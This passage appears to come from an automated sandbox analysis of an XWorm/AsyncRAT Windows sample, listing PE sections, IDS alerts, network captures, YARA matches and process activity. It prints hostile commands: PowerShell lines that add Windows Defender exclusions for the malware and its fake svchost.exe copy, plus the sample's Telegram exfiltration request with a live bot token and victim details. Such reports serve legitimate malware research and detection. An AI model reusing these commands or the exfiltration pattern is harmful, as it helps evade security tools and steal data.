                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x135f40x57.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x4c6.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x116540x118005b9ed3b597bad2b3f8bbaf6e9ed1ac34False0.5898018973214286data6.0358296553925666IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x140000x4c60x60024d8d8a47ec19e29da972c6bddca1affFalse0.3723958333333333data3.6934252048864114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x160000xc0x2000ea496ef717341301189186622ff9471False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x140a00x23cdata0.47202797202797203
                                                                                                    RT_MANIFEST0x142dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-11-21T22:21:01.851871+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973520.189.173.21443TCP
                                                                                                    2024-11-21T22:22:07.016128+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.449749149.154.167.220443TCP
                                                                                                    2024-11-21T22:22:14.748492+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:21.488080+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:21.558331+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44975587.120.112.338398TCP
                                                                                                    2024-11-21T22:22:28.854472+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:35.196511+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:35.200060+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44975587.120.112.338398TCP
                                                                                                    2024-11-21T22:22:35.586248+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:42.240444+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:48.648005+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:48.649987+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44975587.120.112.338398TCP
                                                                                                    2024-11-21T22:22:49.359041+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:49.569088+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:49.569088+01002858924ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:22:55.621654+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:23:01.060097+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:23:06.834762+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    2024-11-21T22:23:07.729313+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.112.338398192.168.2.449755TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 21, 2024 22:22:04.880490065 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:04.880573988 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:04.880697966 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:04.890496969 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:04.890530109 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:06.357068062 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:06.357155085 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:06.360060930 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:06.360081911 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:06.360491991 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:06.400813103 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:06.411943913 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:06.459374905 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:07.016227961 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:07.016407967 CET44349749149.154.167.220192.168.2.4
                                                                                                    Nov 21, 2024 22:22:07.016477108 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:07.023976088 CET49749443192.168.2.4149.154.167.220
                                                                                                    Nov 21, 2024 22:22:07.142909050 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:07.262557983 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:07.264103889 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:07.299132109 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:07.424273968 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.748492002 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.791542053 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:14.813872099 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:14.934746981 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.934804916 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.934845924 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.934875011 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.934915066 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.935025930 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:14.935054064 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:20.920923948 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:21.041016102 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:21.488080025 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:21.541450977 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:21.558331013 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:21.677928925 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:21.698457003 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:21.744605064 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:21.751565933 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:21.871618032 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:21.871754885 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:28.854471922 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:28.891292095 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:29.011054039 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:29.011404037 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:29.011439085 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:29.056107998 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:34.542310953 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:34.661958933 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.196511030 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.200059891 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:35.320225000 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.586247921 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.635272026 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:35.642343044 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:35.761981010 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.762041092 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.762069941 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.762103081 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.762315035 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.762345076 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:35.762378931 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.240443945 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.286504984 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:42.406619072 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.406686068 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.406713963 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.406744957 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.406903982 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.406930923 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:42.406965017 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:48.167574883 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:48.287775040 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:48.648005009 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:48.649986982 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:48.769676924 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.359040976 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.400959969 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:49.417718887 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:49.537415981 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.537446022 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.537503958 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.537518978 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.537597895 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.537611008 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.537667990 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.569087982 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:49.619782925 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:55.621654034 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:55.666608095 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:55.687491894 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:22:55.807440042 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:55.807482004 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:22:55.807511091 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:01.060096979 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:01.104312897 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:23:01.195853949 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:23:01.315733910 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:01.315826893 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:01.315860033 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:01.360236883 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:01.792124033 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:23:01.912483931 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:06.834762096 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:06.885379076 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:23:07.729312897 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:07.775999069 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:23:10.137213945 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:23:10.193696022 CET497558398192.168.2.487.120.112.33
                                                                                                    Nov 21, 2024 22:23:10.256789923 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:10.313443899 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:10.313615084 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:10.313647032 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:10.313703060 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:10.313750029 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:10.313779116 CET83984975587.120.112.33192.168.2.4
                                                                                                    Nov 21, 2024 22:23:10.313827038 CET83984975587.120.112.33192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 21, 2024 22:22:04.731816053 CET6436553192.168.2.41.1.1.1
                                                                                                    Nov 21, 2024 22:22:04.869993925 CET53643651.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Nov 21, 2024 22:22:04.731816053 CET192.168.2.41.1.1.10xeb4fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Nov 21, 2024 22:20:54.846045971 CET1.1.1.1192.168.2.40x322eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                    Nov 21, 2024 22:20:54.846045971 CET1.1.1.1192.168.2.40x322eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                    Nov 21, 2024 22:22:04.869993925 CET1.1.1.1192.168.2.40xeb4fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                    • api.telegram.org
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449749149.154.167.2204437312C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-11-21 21:22:06 UTC448OUTGET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-11-21 21:22:07 UTC388INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Thu, 21 Nov 2024 21:22:06 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 439
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2024-11-21 21:22:07 UTC439INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 36 37 33 30 30 34 30 35 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 74 65 61 6c 65 72 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 63 68 61 6c 6c 61 53 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 34 37 30 34 33 36 35 37 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 20 4d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 68 65 6e 63 68 61 6e 67 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 32 32 34 31 32 36 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 32 30 20 5b 58 57 6f 72 6d 20
                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":1388,"from":{"id":6673004050,"is_bot":true,"first_name":"StealerBot","username":"MachallaSBot"},"chat":{"id":1470436579,"first_name":"H M","username":"chenchang1","type":"private"},"date":1732224126,"text":"\u2620 [XWorm


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:16:20:59
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                    Imagebase:0x5c0000
                                                                                                    File size:74'240 bytes
                                                                                                    MD5 hash:8D52069BD117DA94E0B0B70E73E33FB0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:1
                                                                                                    Start time:16:21:02
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:16:21:02
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:4
                                                                                                    Start time:16:21:09
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:16:21:09
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:16:21:21
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:16:21:21
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:11
                                                                                                    Start time:16:21:42
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:12
                                                                                                    Start time:16:21:42
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:16:22:13
                                                                                                    Start date:21/11/2024
                                                                                                    Path:C:\Users\user\AppData\Local\svchost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\svchost.exe"
                                                                                                    Imagebase:0x40000
                                                                                                    File size:74'240 bytes
                                                                                                    MD5 hash:8D52069BD117DA94E0B0B70E73E33FB0
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\svchost.exe, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\svchost.exe, Author: ditekSHen
                                                                                                    Antivirus matches:
